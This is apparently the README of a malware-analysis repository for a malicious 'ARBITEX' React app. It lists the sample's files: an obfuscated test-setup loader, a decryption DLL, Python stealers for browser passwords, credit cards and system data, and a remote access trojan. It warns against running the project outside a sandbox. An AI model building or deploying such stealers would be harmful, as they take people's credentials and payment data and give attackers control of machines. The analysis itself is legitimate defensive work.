The is the Malware Analysis of ARBITEX React App Project which is mentioned in my LinkedIn post and explained in depth in my Blog post
I've commented the
package.jsonstart script, kindly do not run this project on your system. Use an isolated or sandboxed environment for analyzing this malware.
setupTests.js
setupTestsDecoded.js : Debobfuscated & Unminified version of the main malware script
store.node : Windows DLL used to decrypt the encrypted_key which is used for decrypting the browser store values
p2.zip : Python Executable zip file in case python is not installed on the windows os
.npl : Obfuscated Python Malware
.nplDecoded.py : Deobfuscated Python Malware
.n2/GetSystemInfoPayloadDecoded.py : Python Malware used to steal System Information and Geolocation Informatio
.n2/GetBrowserPasswordsAndCreditCardsDataDecoded.py : Python Malware used to steal Browser Passwords and Credit Cards data
.n2/RemoteAccessTrojan.py : Python R.A.T used to steal system files and execute commands on the system